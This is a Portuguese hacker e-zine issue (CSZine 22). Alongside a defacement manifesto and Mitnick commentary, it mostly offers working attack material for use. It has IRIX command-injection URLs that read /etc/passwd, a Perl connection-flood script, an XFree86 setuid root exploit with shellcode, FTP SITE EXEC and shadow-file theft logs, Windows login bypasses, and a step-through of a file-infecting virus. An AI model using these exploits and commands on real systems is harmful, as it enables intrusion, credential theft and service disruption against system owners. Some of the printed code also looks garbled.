Copy Link
Add to Bookmark
Report

Cszine 22

eZine's profile picture
Published in 
CSZine
 · 1 year ago

     cCCCc     sSSSs  zZZZZZZZZz ii NNn      NN    eEEEe       222    222 
cCC CCc sSS SSs zZ II NNNn NN eEE EEe 22 22 22 22
cCC CC sSS SS zZ NN Nn NN eEE EE 22 22 22 22
cCCC SSSs zZ ii NN Nn NN eEEE ## 22 22
CCCC SSSs zZ II NN Nn NN EEEEEEEe ## 22 22
CCCC SSSs zZ II NN Nn NN EEEE 22 22
CCC cC Ss sSS zZ II NN NnNN EEe eE 22 22
CCc cCC SSs sSS zZ II NN NNN EEe eEE 22 22
CCCCC SSSSS zZZZZZZZZz II NN NN EEEEE 222222 222222


C S Z I N e - 2 2


¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯


* E-Mail da revista : cszine@hotmail.com
* Memoserv de Struck : /msg memoserv send Struck <msg>
(Soh no irc.via-rs.com.br)
* Page da revista : http://members.xoom.com/cszine

Introduction

22 - Dois patinhos na lagoa.

Antes de começar eu quero colocar que eu meio que troquei as bolas lah na Invasão de Privacidade da edicao passada. O que o BO faz nao e' soh deixar que mapeem suas unidades. Com ele vc pode usar qquer recurço do sistema que tiver rodando o servidor.

Desde mandar msgs para o usuario, ateh rebootar o computador dele.

Eu nao to com saco de explicar como funciona esse brinquedinho, por isso deixei para a proxima edicao (quem sabe).

A secao phreaking nao saiu porque essa edicao foi fechada muito em cima da csz21 e nem recebi emails sobre o assunto tratado na edicao passada.

Atencao!! Nao me mandem emails querendo o email do Phoenix, nem eu sei. Ele e' meu colega de aula e manda as materias por disquete e via modem.

Indice

Secao:	Materia:		Assunto:			Autor: 

1. Manifesto UHF Manifesto Ghost Invader
2. Kevin Mitnick TO MITNICK OR NOT MITNICK Bernie S.
3. Programação Anti-virus Leandro&Kelly Cheat Struck
4. VIRII Programando um virus Simon Phoenix
5. Crackerz Enganando o Programa Cheat Struck
6. Bugz Bugz para IRIX Simon Phoenix
7. Hacking para iniciantes Quebrando senhas(BSD, Win) Cheat Struck
8. Invasao de privacidade Obtendo prompt de root Cheat Struck
9. Hack, the Art Hacking via FTP [5 truques] Cheat Struck
10. Emails & BoNuS Como o nome jah diz.. Cheat Struck

1. Manifesto

UHF Manifesto

°°°Antenção!!! Esse manifesto se encontra em todas os hosts hackeados pela UHF. Nada foi alterado.

Esta hp foi invadida pela organização hacker UHF.
Voce quer saber porque invadimos hp??

Porque nós somos discriminados por voces, homens que dizem fazer justiça e governantes corruptos que afundam nosso país...

Na sua sociedade mesquinha e corrupta somos chamados de bandidos perigosos com mentes criminosas e que queremos destruir o mundo..

O nosso crime nao seria ser mais inteligentes e aplicados do que vcs?

Ja que sabem que o computador existira em cada casa do mundo porque nao se aprofundam mais nesse maravilhoso universo digital e tentem nos entender, ao inves de tirar nossa liberdade como no caso Mitnick.

Pensem um pouco e tentem se lembrar de ah 2 anos atras... existia tantos hackers invadindo sistemas e alterando hps??

Voces deveriam pensar um pouco antes de nos denominar criminosos, talvez estejam ate gerando mais, ja que existem milhoes de "justiceiros digitais" que tambem se revoltam contra tamanha hipocrisia.

Somos filhos de uma sociedade cruel e corrupta que voces mesmo geraram, e como tal nao somos tratados com dignidade paterna.

Sempre que estiver perto de um computador na sua casa ou na sua empresa, lembrem-se, sempre estaremos la, dentro da sua maquina, esperando somente um motivo justo para acabar com voce....

Voce pode deter um de nos, mas nao podera deter todos....

'Ghost Invader

2. Kevin Mitnick

TO MITNICK OR NOT MITNICK? (por Bernie S.) - parte 2 -

So' sete meses depois que isso veio a tona, e' que o cara passou a ser tratado como um preso comum. So' para se ter uma ideia: como as condicoes de prisao estabeleciam que o reu tinha que permanecer longe do telefone, ele foi mantido na solitaria 23 horas por dia, coisa de criminoso da pesada, que baguncava o coreto la' dentro. E' que o pessoal achava que era a unica forma de manter o dito longe dos telefones. A juiza sabia disso, mas nao deu a minima. Robert Morris, que fez o verme da Internet, causou prejuizos muito maiores e ficou em casa esperando a coisa se desenvolver.

O pior de tudo e' que isso ai' mais ou menos se repetiu na segunda prisao. Um monte de acusacoes foi jogada em cima do cara, altos lances da midia que ganhou uma grana preta vendendo jornais sobre o fato e .. o computador do Tsutomu Shimomura foi invadido de novo, depois que o cara tava na prisao. Parece que no livro "The Fugitive Game" Jonathan Littman, a historia e' um pouco menos parcial. O Littman era quem mantinha contato na imprensa com o foragido, coisa que o Markoff nao tinha. Mas tudo bem. Parece que foram US$ 750.000 no livro, US$ 200.000 na possibilidade de filme e qualquer coisa entre US$ 250-500.000 de direitos autorais para o exterior. Sem duvida, o crime compensa para quem prende o criminoso.Mitnick e' tudo o que falam dele? Nao sei. Tem trocentos artigos na Internet, incluindo o www.takedown.com (org?) com todos os detalhes que estao no livro. Nao vou pagar para ler o que posso conseguir de graca. E o "show" nao me interessa. Enfrento uma p(*) paranoia aqui na USP. Sem ter hackeado nada, tive minha conta "congelada" por meses. O pessoal que fez isso nem sequer pensou que se eu ficasse p(*) de raiva, se eu fosse um demente, poderia publicar detalhes de como hackear o proprio sistema onde trabalho, coisa que sempre me neguei a fazer. Faco um baita trabalho academico que a Universidade pode se gabar de ter sido pioneiro na Internet e sou premiado com isso. E vou ler sobre a desgraca dos outros .. nao ganho para isso. A historia de um break-in tem varios lados: o que o cara fez, o que o sysop diz que ele fez e o que a imprensa diz que ele fez. O cara vai falar uma coisa x, que o sistema era facil de entrar, o sysop vai falar que o sistema era dificil (obvio, nao quer fazer papel de incompetente) , o garoto e' que e' um perigo. E a imprensa vai fazer um estardalhaco, para vender jornal, repetindo qualquer coisa que estimular a curiosidade dos leitores. Choses de la vie.

As ultimas noticias sobre Mitnick sao de que ele fez um acordo com a Corte de Los Angeles, segundo o qual ele admite culpa pela posse ilegal de codigos de telefone celular e violar a condicional de uma condenacao 1989. Isso dai', de acordo com o advogado dele, John Yzurdiaga pode, atraves de um apelo, reduzir a sentenca para menos de um ano para o lance do celular e a sentenca maxima para a violacao de condicional e' de dois anos. O chato e' que o cara nao fez nenhum crime para ganhar dinheiro, mas por conta da curiosidade. A sociedade o elegeu super-criminoso, mas nao o perdoou nem o re-integrou a seu meio. Ele tentou varios empregos quando foi liberado da outra vez, mas seu passado sempre o perseguia.

Infelizmente, nao e' o unico caso de perseguicao implacavel. Nos EUA, esta' ficando comum o uso de sentencas pesadas para casos que, na justica comum, seriam passiveis de suspensao da pena ou coisa do genero, se o reu tiver algum comprometimento serio com hacking. Mais ou menos assim: se voce fez algo serio, mas que nao pode ser enquadrado como crime de hacking, pode acontecer que o sistema judiciario se aproveite de uma contravencao qualquer para colocar pressao em cima de voce. Nao so' nos EUA. Na Franca, um livro que foi recolhido por contar que um presidente frances, (que recentemente passou dessa para melhor) ja' tinha cancer e estava desenganado a bem mais tempo. O autor do livro resolveu colocar o mesmo na Internet. Nao vou dizer se tenho ou nao a copia, ta' em frances (sans aucun probleme por moi) e o assunto do livro nao me interessa. Porem o governo frances nao gostou da esperteza da coisa. E.. como condenar o cara?

Na Internet e' territorio internacional. So' o Islam e a China resolveram fazer "censura" naquilo que entra em seu territorio. Pega mal pacas pra Franca enveredar por este caminho por conta de um livro. Bom, o lancamento do livro foi feito num Cyber-cafe'. Foram prender o gerente. Por conta do livro, que nao foi ele que escreveu, so' ajudou a lancar na Internet? Nao, porque ele era (se nao me engano) foragido da policia por conta de nao pagamento da pensao alimenticia ou coisa do genero. Provavelmente, o dia em que centralizarem os bancos de dados sobre os individuos, talvez seja mais facil para qualquer delegado de policia exercer pressao sobre qualquer individuo em relacao a qualquer coisa, como no caso desse gerente e no caso de varios outros que fazem coisas que sao apenas ilegais, mas nao necesariamente criminais.

Mas, voltando ao assunto, o caso Mitnick nao e' mais Justica Comum. O sistema como um todo, ou pelo menos o sistema bancario e aquilo que compreende o sistema de telecomunicacoes, tipo AT&T e companhias telefonicas em geral , para nao dizer do governo em si, querem "botar para cristo" gente que possa mandar uma mensagem de que proibicoes devem ser respeitadas. E e' uma msg a cada jovem que use uma maquina como o computador para ir alem dos limites que tem como individuo. O Sistema (nao to falando do sistema operacional, mas de um todo que compreende uma piramide encabecada por todas as instituicoes, como sistema juridico, sistema de governo, sistema bancario, sistema educacional etc) se sente ameacado pelo uso dos computadores. Se nao pode controlar o livre acesso do individuo a informacao, quer regular o uso que o individuo faz dela. Nem que seja pelo uso do terror, na forma de prisoes preventivas e interrogatorios "de rotina" em individuos algumas vezes despidos de qualquer intencao malevola.

(fim da parte 2)

3. Programação

Anti virus Leandro & Kelly

Essa materia deveria estar na secao VIRII, mas eu jah tenho assunto para ela. Esse programa verifica a existencia do virus Leandro & Kelly no boot da unidade e informa ao usuario.

Voce pode escolher entre soh detectar ou remover.

Nao vou explicar direitinho como funciona este virus de boot. Deixa isso para a próxima edição.

---------------------------Corte Aki--(REMLK.PAS)---------------------------- 
Program Anti_virii;
USES Crt;

const
SoDetecta = false;
Var
unid : String[2];

function lerFisSetor(_seg,_ofs:word; trilha, setor, cab, unid:byte):Boolean;
var
tent : byte;
carry : byte;
Begin
tent := 0;
repeat
carry := 0;
asm
mov ax,0201h
mov es,_seg
mov bx,_ofs
mov ch, trilha
mov cl, setor
mov dh, cab
mov dl, unid
int 13h
jnc @@1
mov carry, 1
@@1:
end;
tent := tent + 1;
until (tent>5) or (carry=0);
if (tent>5) and (carry<>0) then
lerfissetor := false else lerfissetor := true;
end;

function EscrFisSetor(_seg,_ofs:word;trilha,setor,cab,unid:byte):boolean;
var
tent : byte;
carry : byte;
begin
tent := 0;
repeat
carry := 0;
asm
mov ax,0301h
mov es,_seg
mov bx,_ofs
mov ch, trilha
mov cl, setor
mov dh, cab
mov dl, unid
int 13h
jnc @@1
mov carry, 1
@@1:
end;
tent := tent + 1;
until (tent>5) or (carry=0);
if (tent>5) and (carry<>0) then
escrfissetor := false else escrfissetor := true;
end;

function BootTp_lk( Unid : byte ): Boolean;
var
bootTp : array[0..$400] of byte;
Vitima : array[0..$200] of byte;
_Ofs, _Seg : Word;
vit_ofs, vit_seg : Word;
tent : byte;
carry : byte;
tem : Boolean;
trilha, setor, cab : byte;
begin
_Seg := Seg(BootTp);
_Ofs := Ofs(BootTp);
LerFisSetor(_seg, _ofs, 0, 1, 0, unid);
Tem := true;
if (BootTp[$20]) <> $0FA then Tem := false;
if (BootTp[$21]) <> $0BC then Tem := false;
if (BootTp[$22]) <> $000 then Tem := false;
if (BootTp[$23]) <> $07C then Tem := false;
if (BootTp[$24]) <> $033 then Tem := false;
if (BootTp[$25]) <> $0C0 then Tem := false;
if (BootTp[$26]) <> $08E then Tem := false;
if (BootTp[$27]) <> $0D0 then Tem := false;
if (BootTp[$28]) <> $0B8 then Tem := false;
if (BootTp[$29]) <> $000 then Tem := false;
if Tem then
begin
BootTp_lk := true;
writeln(#7, 'ENCONTRADO VIRUS Leandro e Kelly na Unidade');
vit_seg := seg(vitima);
vit_ofs := ofs(vitima);
if not SoDetecta then
begin
trilha := boottp[$1d];
setor := boottp[$1c];
cab := boottp[$1f];
if not lerfissetor(vit_seg,vit_ofs,trilha,setor,cab,unid) then
begin
Writeln('ERRO de leitura no disco...');
Exit;
end;
if not escrfissetor(vit_seg,vit_ofs,0,1,0,unid) then
begin
writeln('ERRO de escrita no disco...');
exit;
end
else
begin
Writeln('REMOVIDO: Virus Leandro&Kelly da unidade.');
end;
end;
end
else
begin
BootTp_lk := false;
end;
end;


begin
writeln(' AntiVirus Leandro&Kelly por Cheat Struck');
if ParamCount = 0 then
begin
writeln(#7, 'Faltou Definir Drive...');
Halt(1);
end;
unid := ParamStr(1);
case UpCase(Unid[1]) of
'A':if not BootTp_lk(0) then writeln('Nada Encontrado...');
'B':if not BootTp_lk(1) then writeln('Nada Encontrado...');
'C':if not BootTp_lk($80) then writeln('Nada Encontrado...');
end;
End.

-----------------------------------------------------------------------------

4. VIRII

Programando um virus (por Simon Phoenix)

ATENCAO!!! Esse texto e' extremamente complicado, eu nunca pensei em tentar explicar como montar um virus, mas tentei. Se vc achar que ta dificiul de entender, pare de ler e procure por textos de assembly e processadores da Intel. Ou fique soh nos trojans.

Do contrario do que disse o Struck o nome do virus e' Amstrad, porem contem uma serie de dados iguais ao pixel, por isso nao eh corretamente reconhecido pelos Anti-Virus.

Vamos usar o virus mostrado na edicao passada como exemplo. Esse e' um verdadeiro modelo de como nao se deve ser um virus. Ele nao altera a data, os atributos nem nada. Mas e' um bom modelo para começar.

Abra o v1rv.com com o debug (debug v1rv.com) para lermos ele.

Agora digite r e veja o primeiro comando do virus.

-r 
AX=0000 BX=0000 CX=0151 DX=0000 SP=FFFE BP=0000 SI=0000 DI=0000
DS=1885 ES=1885 SS=1885 CS=1885 IP=0100 NV UP EI PL NZ NA PO NC
1885:0100 EB14 JMP 0116

Note que o CX = 0151, isso e' o tamanho do programa (337B em hexa).

Se voce ainda nao se familharisou com o DEBUG, jah ta' na hora, pois servira' tanto para virii quanto para cracking. O primeiro comando e' o 'JMP 0116' sendo assim o debug direcionará o virus para o IP 0116.

Digite 'p' para executar o comando.

Vamos seguir os comandos calmamente..

1885:0116	MOV     AX,CS		;O valor de CS e' 1885(note o 
^^^^ sublinhado), sendo assim, AX=1885.
1885:0118 ADD AX,1000 ;Primeiro adiciona mais 1000 no AX
1885:011B MOV ES,AX (1885 + 1000 = 2885) e depois coloca
este valor no ES(antigamente tambem
era 1885).
1885:011D INC BYTE PTR [0105] ;Recorda que estamos em 1885:0105 .
Logo veremos pra que serve.
1885:0121 MOV SI,0100 ;Indica o inicio do virus(DS:SI ou
1885:0100).
1885:0124 XOR DI,DI ;Indica o final do virus(ES:DI ou
2885:0000).
1885:0126 MOV CX,014F ;Indica o tamanho do virus(335B).
1885:0129 REPZ
1885:012A MOVSB

Essa parte e' como uma area de definicoes no Pascal. Vejamos as seguintes:

1885:012B	MOV     DX,025F		;Isso executa a funcao 1A no Int 21, 
1885:012E MOV AH,1A estabelecer a direcao do DTA em
1885:0130 INT 21 1885:025F(DS:DX).

O DTA e' a zona de memoria. Essa zona como padrão se encontra em 1885:0080 (DS:0080), nos a mudamos para 1885:025F. Soh que agora os outros comandos vao escrever nessa zona tb. Para arrumar isso..

1885:0132	MOV     DX,0106		;Isso faz com que o DTA haja com sua 
1885:0135 MOV CX,0016 irmã(1885:0106).
1885:0138 MOV AH,4E
1885:013A INT 21
1885:013C JB 019E

Para ver a zona de memoria irmã, digite no prompt do debug: d ds:106
Viu???

*.COM.O

Este e' o ASCII que sera' procurado pelo virus.
O 'MOV CX,16' deve ser bem explicado:

Primeiro se transforma ele em binario:

 1 0 1 1 0 
| | | | |
| | | | +---Arquivo somente leitura
| | | +---Arquivo oculto
| | +---Arquivo do sistema
| +---Etiqueta de volume
+---Diretorio

Aqui o CX vale como se fosse atributos do Arquivo. Os que estao marcados com 1 quer dizer que e' um atributo valido, com 0 nao.

Aqui vai uma lista de funcoes do comando 4E.

CX = 1 ao 20			;Atributo Reservados do Arquivo 
CX = 21 ;Atributo Geral do Arquivo
CX = 22 a 23 ;Hora do Arquivo
CX = 24 a 25 ;Data do arquivo
CX = 26 a 29 ;Tamanho do arquivo
CX = 30 a 42 ;Nome e extencao

Essas funcoes tb valem para o comando 4F.

Voltando ao virus.. Digamos que o virus encontre um arquivo .COM, ele executaria a seguinte manobra entao:

1885:013E	MOV     DX,027D 
1885:0141 MOV AX,3D02
1885:0144 INT 21
1885:0146 MOV [0114],AX
1885:0149 MOV BX,AX

Isso abre o arquivo da area DS:DX (1885:027D) para leitura/escrita. Essa area apenas indica que o arquivo estah na zona DTA. O arquivo e' guardado em 1885:0114 e colocado em BX.

Por hoje e' soh. E' muito chato explicar um virus, nao dah pra fazer isso numa soh edicao. Na CSZine23 eu acabo isso. Espero que estejam gostando porque to gastando um bucado de neuronios para isso.

5. Crackerz

Enganando o Programa

Sabe akeles programas ou jogos que precisam do CD para rodarem? Claro que sabe, porque eu perguntei. Aqui vou ensinar como fazer o programa acreditar que o CD estah no drive. Aqui vao algumas manhas:

1. Veja se existe um config.cfg em algum diretorio do jogo jah instalado no HD. Se existir abra-o e procure por uma linha tipo:

CD-ROM DRIVE: D:

Entao mudea para:

CD-ROM DRIVE: C:\JOGOS\SIMCITY\

2. Copie a parte do CD que e' usada pelo jogo para o um diretorio do HD. Entao resete o computador sem carregar o MSCDEX para o DOS nao reconhecer a unidade de CD-ROM (ele estah no autoexec.bat e config.sys). Entao entre no DOS e digite: subst D: C:\JOGOS\SIMCITY\
Essa dica soh funcionara' se o jogo for para DOS.

3. Depois de instalar o Jogo, rode um programa que particione o HD, assim a particao fica com o nome de D: e o jogo se confunde. Copie o conteudo do jogo do CD para essa particao.

4. Rode um editor hexadecimal no jogo e procure a palavra 'D:', altere tudo, inclusive os dirs para a unidade local(C:) e salve. Agora copie os diretorios que serao carregados pelo jogo, para o HD(na Raiz).

5. Rode um editor hexadecimal no jogo e procure pelo hexa 'CD 2F'(int 2F). Para quem nao sabe essa e' a interrupcao do CD. Esse meio e' dificio pq voce deve conhecer um pouco de assembly e um pouco dos codigos hexadecimais para alterar as instrucoes dessa int.

6. Bugz

Bugz para IRIX (por Simon Phoenix)


´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´
* Versıes : 5.6 a 6.3
* Descrição : Sistema de logs
* Exploit :

Login: ../../etc/hosts.denny 
pass:
LOGIN INCORRECT!

Isso ira' modificar o /etc/hosts.allow, colocando um misero byte nele, dando acesso ao seu sistema a qquer um. Jah percebeu como funciona?? Voce pode criar quantos arquivos quizer no sistema, colocando o seu caminho no login.


´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´
* Versão : 6.2
* Descrição : Executar comandos de maneira remota
* Exploit :
# telnet target.host.com 80
GET /cgi-bin/handler/qquercoisa;cat/etc/passwd|?data=Download
HTTP/1.0


´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´
* Versão : ??
* Descrição : Ataque DOS ao Identd
* Exploit :
Para os desenformados: Esse exploit foi escrito e perl(/usr/bin/perl)

---------------------------Corte Aki--(atack.pl)----------------------------- 
#include <Socket.pm>
use Socket;
my($h,$p,$in_addr,$proto,$addr);
$h = "$ARGV[0]";
$p = 6667 if (!$ARGV[1]);
if (!$h) {
print "Pon algun nombre de host. Ej: irc.arrakis.es\n";
}
$in_addr = (gethostbyname($h))[4];
$addr = sockaddr_in($p,$in_addr);
$proto = getprotobyname('tcp');
&connect;

sub connect {
print "Conexion en progreso:\n";
socket(S, AF_INET, SOCK_STREAM, $proto) or die $!;
connect(S,$addr) or die $!;
select S;
$| = 1;
print "Vamonos!\n";
select STDOUT;
close S;
&connect;
}
-----------------------------------------------------------------------------

´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´
* Versıes : 6.2 e 6.3
* Descricão : Get /etc/passwd
* Exploit :
http://host.com.br/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd


´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´ª´
* Versıes : 6.3 e 6.4
* Descrição : Get /etc/passwd
* Exploit:
# telnet target.machine.com 80
GET /cgi-bin/handler/whatever;cat /etc/passwd|? data=Download

7. Hacking para iniciantes

Novo Unshadow

Este programa e' uma variacao do unshadow original, para linux. Como o original (encontrado na page e em edicoes passadas) nao funciona em BSD's, aqui tah a fonte pronta para ser rodada.

Nao estou certo do autor desse programa, soh pra deixar claro que nao fui eu que o atualizei.

Nao sei se vou mudar lah na pagina, pois atualmente eu soh to colocando as novas edicoes da zine e deu.

---------------------------Corte Aki--(unshad.c)----------------------------- 
struct SHADOWPW {
char *pw_name;
char *pw_passwd;
int pw_uid;
int pw_gid;
int pw_quota;
char *pw_comment;
char *pw_gecos;
char *pw_dir;
char *pw_shell;
};

struct passwd *getpwent(), *getpwuid(), *getpwnam();
#ifdef elxsi
#define SHADOWPW "/etc/shadowpw"
#define SHADOWPW_PAG "/etc/shadowpw.pag"
#define SHADOWPW_DIR "/etc/shadowpw.dir"
#define CHANGE_TRIES 3
#define PASSWD_PROG "/bin/passwd"
#define EXEMPTPW "/etc/exemptpw"
#define MAX_EXEMPT 100
#define BSD_CRIT 0
#define STR_CRIT 1
#define MAX_CRIT 1
#endif elxsi
#define NULL 0
main()
{
struct passwd *p;
int i;
for (;1;) {3
p=getpwent();
if (p==NULL) return;
printpw(p);
}
}
printpw(a)
struct SHADOWPW *a;
{
printf("%s:%s:%d:%d:%s:%s:%s\n",
a->pw_name,a->pw_passwd,a->pw_uid,a->pw_gid,
a->pw_gecos,a->pw_dir,a->pw_shell);
}

-----------------------------------------------------------------------------

Quebrando os passwords no Windows

Pode ser coisa meio lamer, mas antes de falar qquer bobagem, leia o topic da secao("Hacking par *INICIANTES*").

Vou ensinar apenas algumas maneiras das diversas existentes de passar pelo logon de senha do Windows.

*1*
Reinicie o computador e tecle F8 quando anunciar que o windows esta carregando.. Escolha a opcao somente o prompt.

Apos entrar no DOS, va ao diretorio do windows(padrao \WINDOWS) e de um dir *.pwl , O nome do arquivo e' o login da conta. Delete esses arquivos, ou renomeie-os para *.aaa .

Volte para o windows e digite um novo login/senha.


*2*
No logon de inicio, basta nao digitar nada e clicar em cancelar.


*3*
Para escapar de um logon de uma protecao de tela, basta colocar um CD com autorun(para saber, verifique se existe o autorun.ini na raiz do drive de CD). O windows rodará o autorun do CD e esquecera' do screensaver.


*4*
Tecle Crtl+Alt+Del e finalize a janela do logon.


*5*
Edite o win.ini(pelo DOS se for preciso) e apague todas as linhas que contem as instrucoes: "load=" e "run=".

Vou parar de escrever por aqui pois jah deu pra perceber a inseguranca que o Windows nos passa naum???
Como diz o floyd: O windows e' um otimo videogame ;)

8. Invasao de privacidade

Obtendo prompt de root

Aqui vai um exploit que soh tah saindo porque eu nao tinha mais nada em maos para botar aqui.

Corte aqui este Exploit e compile-o com o cc.
Soh relembrando: cc -o x x.c

-----------------------------Corte Aki--(x.c)-------------------------------- 
#define OFFSET 2
#include <string.h>
#include <unistd.h>
#include <errno.h>

#define LENCODE ( sizeof( Code ) )

char Code[] =
"\xeb\x40\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0"
"\x3f\x89\xc2\x31\xdb\xb3\x0a\x31\xc9\xcd\x80\x89\xd0\x43\x41"
"\xcd\x80\x89\xd0\x43\x41\xcd\x80\x31\xc0\x89\xc3\xb0\x17\xcd"
"\x80\x31\xc0\xb0\x2e\xcd\x80\x31\xc0\xb0\x0b\x89\xf3\x8d\x4e"
"\x08\x8d\x56\x0c\xcd\x80\xe8\xbb\xff\xff\xff/bin/sh";

char Display[ 0x4001 + OFFSET ] = ":99999", *ptr = Display + OFFSET + 1;
char *args[] = { "X", "-nolock", Display, NULL };

main() {
printf("Exploit para XFree86 \npor mAChnHEaD <quenelle@iname.com>\n\nSe
agora nao aparecer o prompt tente usar valores diferentes para o OFFSET.
\n\n"
);
dup2( 0, 10 ); dup2( 1, 11 ); dup2( 2, 12 );
__asm__("movl %%esp,(%0)\n\tsubl %1,(%0)"::"b"(ptr),"n"(LENCODE+0x2000));
memcpy( ptr + 4, ptr, 0x3fc );
memset( ptr + 0x400, 0x90, 0x3c00 - LENCODE );
memcpy( ptr + 0x4000 - LENCODE, Code, LENCODE );
execve( "/usr/X11R6/bin/X", args, args + 3 );
perror( "execve" );
}

-----------------------------------------------------------------------------

Esqueci de falar, este exploit e' para um bug no /usr/X11R6/bin/X que em varias shells esta setado como PATCH para qquer usuario. E' uma bela escolha para hackear sistemas linux.

9. Hack, the Art

Hacking via FTP [1]

Alguns FTPs meio antigos, mas ainda encontrados possuem falhas assim como o comando SITE. Com este comando (que provavelmente e' o mais perigoso do FTP) vc pode fazer por exemplo:

chmod 777 /etc/shadow 
cat /etc/shadow

Bacana ne'?? Vou mostrar como faze-lo com um log para ficar mais rapido e pratico:

# telnet host.com.br 21 
USER Anonymous
PASS ftp@ghost.com
PWD
/pub
SITE CWD /etc
SITE CHMOD 777 shadow
SITE EXEC /bin/cat /etc/shadow >> usr/ftp/pub/senhas
QUIT

Agora conectesse usando o programa ftp e pegue o arquivo senhas no diretorio /pub . Pretty Cool!!!


Hacking via FTP [2]

Este bug era muito divulgado nas paginas hackers a um tempo atraz, atualmente soh os desatualizados ainda disem que voce ainda pode encontra-lo em uns daemons.

O que ele fazia era dar o comando CWD durante o login para entrar como root. Aqui vai o log:

# ftp -n 
ftp> open host.com.br
ftp> quote user ftp
ftp> quote cwd ~root
ftp> quote pass ftp
ftp>

Hacking via FTP [3]


Esse e' uma falha do descompactador 'tar' que vinha como padrão para poder ser executado por qquer usuario ftp (inclusive o Anonymous).

Veja o Login:

# telnet host.com.br 21 
USER Anonymous
PASS ftp@ghost.com
SITE EXEC tar -c -v --rsh-command="qquer comando" -f somebox:foo foo
QUIT

Assim voce pode executar qualquer comando do sistema, trocando o "qquer comando" pelo comando.


Hacking via FTP [4]

Este meio de pegar o /etc/shadow utiliza um bug das versoes antigas do wu-ftpd (o mais usado por provedores). Jah conectado ao telnet do servidor faça segundo o log:

$ ftp -n localhost 
ftp> user bunda
Password:
ftp> ^Z
[1]+ Stopped ftp -n localhost

$ ps uwx
USER PID %CPU %MEM SIZE RSS TTY STAT START TIME COMMAND
bunda 15510 0.0 5.4 384 384 pp6 S 14:32 0:01 -bash
bunda 15811 0.7 3.9 113 276 pp4 T 15:09 0:00 ftp -n localhost
bunda 15812 2.0 7.1 157 500 con S 15:09 0:00 -localhost: marekm:IDLE
bunda 15816 0.0 3.1 64 224 pp4 R 15:10 0:00 ps uwx

$ ls -al /proc/15812/fd
total 0
dr-x------ 2 joberto users 0 Jun 9 15:10 .
dr-xr-xr-x 4 joberto users 0 Jun 9 15:10 ..
lrwx------ 1 joberto users 64 Jun 9 15:10 0 -> [0000]:0
lrwx------ 1 joberto users 64 Jun 9 15:10 1 -> [0000]:0
l-wx------ 1 joberto users 64 Jun 9 15:10 10 -> [0301]:4623
l-wx------ 1 joberto users 64 Jun 9 15:10 11 -> [0301]:4624
l-wx------ 1 joberto users 64 Jun 9 15:10 2 -> [0301]:10404
lrwx------ 1 joberto users 64 Jun 9 15:10 3 -> [0000]:0
lrwx------ 1 joberto users 64 Jun 9 15:10 4 -> [0000]:0
lr-x------ 1 joberto users 64 Jun 9 15:10 5 -> [0301]:38392
lr-x------ 1 joberto users 64 Jun 9 15:10 6 -> [0301]:8567
lrwx------ 1 joberto users 64 Jun 9 15:10 7 -> [0301]:34549
lr-x------ 1 joberto users 64 Jun 9 15:10 8 -> [0301]:8569
lr-x------ 1 joberto users 64 Jun 9 15:10 9 -> [0301]:32007

$ ls -i /etc/shadow
32007 /etc/shadow

$ cat /proc/15812/fd/9
root:Ab7d/r3se:0:0:User Root:/home/root:/bin/bash
...

$ fg
ftp -n localhost
221 Goodbye.

$ exit

Hacking via FTP [5]

Essa maneira ira criar o core e depois verificar se ele armazenou uma senha.

$ ftp -n -i 
ftp> open ftp.host.com.br
ftp> user poliana xx
ftp> quote pasv
ftp> quit

$ strings /core

10. Emails & Bonus!

Emails..


-=-=-=-=-=-=-=-=-=-=-

From: XXXXX@xoommail.com
Subject: WinNT

> Ae Struck.
>
> A CSZine tah blza mesmo mano, porem tem umas materias que nao me agradaram muito como por exemplo as varias edicoes em que sairam metodos de hackear WinNT. Eu uso a internet por quase 2 anos e ainda nao encontrei um provedor que use um Windoze NT.
>
> Espero que escreva mais sobre UNIX.
>
> Eu poderia ter mandado o email apenas dizendo que a CSZine ta bacana, mas como tu pediu para dar criticas.
>
> Ass: XXXXX

Eu me impressiono que em 2 anos de internet voce nao tenha encontrado um provedor que use WinNT. So' de Porto Alegre eu posso citar 3:

  • TCA Internet Provider (tca-nt.tca.com.br)
  • VaNet Internet Solutions (dolar.vanet.com.br)
  • Universo On Line - UOL (cobato.uol.com.br)

Se quizer descobrir se o provedor esta de WinNT entre pelo FTP e veja se ele usa o Microsoft FTP Service, se sim, vc jah sabe. Voce tb pode notar pela diferenca que tem a estrutura dos diretorios num WinNT para um UNIX.

Obrigado pelo elogio.


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

From : XXXXX@CPOVO.com.br
Subject : Perguntas sobre linux

> ola
> eu li todas as edicoes dessa zine(até a 20) e como as outras ela ainda nao
>conseguiu resolver os meus problemas com o linux redhat
> 1 - como usar a multi-função do linux ?
> 2 - como me conectar com o linux ?
> 3 - pode colocar uma listinha de comandos para bitchx ?
> porfavor responda as perguntas para mim não ter mais que usar o windoze 95.

Tudo bem. Eu iria colocar essas questoes na secao de Hacking para iniciantes, mas ai iria ficar apenas um email.
